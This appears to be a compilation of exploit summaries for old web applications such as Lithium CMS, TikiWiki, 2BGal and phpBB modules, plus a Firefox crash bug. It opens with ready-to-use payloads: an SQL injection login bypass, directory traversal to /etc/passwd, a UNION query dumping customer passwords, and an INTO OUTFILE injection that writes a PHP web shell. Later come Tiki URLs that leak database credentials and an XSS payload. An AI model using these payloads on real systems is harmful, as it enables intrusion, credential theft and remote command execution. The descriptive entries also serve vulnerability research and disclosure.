Bypass Login: username:admin password:' or 'a'='a Read Files: /index.php?page=info&action=../../../../../../../../../../../../etc/passwd%00 List Passwords: /index.php?page=details&prod=1%20UNION%20SELECT%201,password,3,loginname,5,6,7,8%20FROM%20customer Path Disclosure: /index.php?page=info&action=../../1337inexistant Create Files (needs Path Disclosure): /index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'/langs/uk/fork.php?cmd=ls
This exploit allows remote attackers to execute arbitrary code on vulnerable installations of Lithium CMS. Authentication is not required to exploit this vulnerability. The vulnerability is due to the 'index.php' script not properly sanitizing user-supplied input to the 'news_id' parameter. An attacker can exploit this vulnerability to execute arbitrary code under the context of the webserver process.
An anonymous user can dump the MySQL user & passwd just by creating a MySQL error with the 'sort_mode' var, with the following links: /tiki-listpages.php?offset=0&sort_mode=, /tiki-lastchanges.php?days=1&offset=0&sort_mode=, /messu-archive.php?sort_mode=, /messu-mailbox.php?sort_mode=, /messu-sent.php?sort_mode=, /tiki-directory_add_site.php?sort_mode=, /tiki-directory_ranking.php?sort_mode=, /tiki-directory_search.php?sort_mode=, /tiki-forums.php?sort_mode=, /tiki-view_forum.php?forumId=, /tiki-friends.php?sort_mode=, /tiki-list_blogs.php?sort_mode=, /tiki-list_faqs.php?sort_mode=, /tiki-list_trackers.php?sort_mode=, /tiki-list_users.php?sort_mode=, /tiki-my_tiki.php?sort_mode=, /tiki-notepad_list.php?sort_mode=, /tiki-orphan_pages.php?sort_mode=, /tiki-shoutbox.php?sort_mode=, /tiki-usermenu.php?sort_mode=, /tiki-webmail_contacts.php?sort_mode=. There is also a XSS vulnerability at /tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--
2BGal 3.0 is vulnerable to a remote command execution vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which can lead to arbitrary code execution. The exploit code provided by Kw3[R]Ln from Romanian Security Team can be used to exploit this vulnerability.
Innovate Portal version 2.0 is vulnerable to remote code execution. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'content' parameter of the 'acp.php' script, and the 'avatar' parameter of the 'usercp.php' script. An attacker can exploit this vulnerability to upload arbitrary PHP code and execute it in the context of the webserver process.
Mozilla Firefox is prone to a D.O.S within its javascript Range object. In a special condition, a NULL Pointer Deference occur and Firefox crashes. When a DOCUMENT_TYPE_NODE (<!DOCTYPE...) element is passed to selectNode method and trigger a NULL Pointer deference when calling createContextualFragment method.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'theme' parameter to '/themes/fin.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'filename' parameter to the 'savebackup.php' script. This can be exploited to include arbitrary files from remote hosts and execute arbitrary PHP code. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. The code in the test.txt file contains a passthru command which can be used to execute arbitrary commands on the vulnerable system.
This exploit allows an attacker to bypass the authentication process of E Annu 1.0 by exploiting a SQL injection vulnerability in the login process.
Spider Friendly 1.3.10 is a module of phpBB modified by Przemo. It is vulnerable to a Remote File Include vulnerability which allows an attacker to include a remote file containing arbitrary code and execute it on the vulnerable server. The vulnerability exists due to the 'phpbb_root_path' parameter in the 'modules_data.php' script not being properly sanitized before being used in a 'require_once' PHP function call.
Services By CQR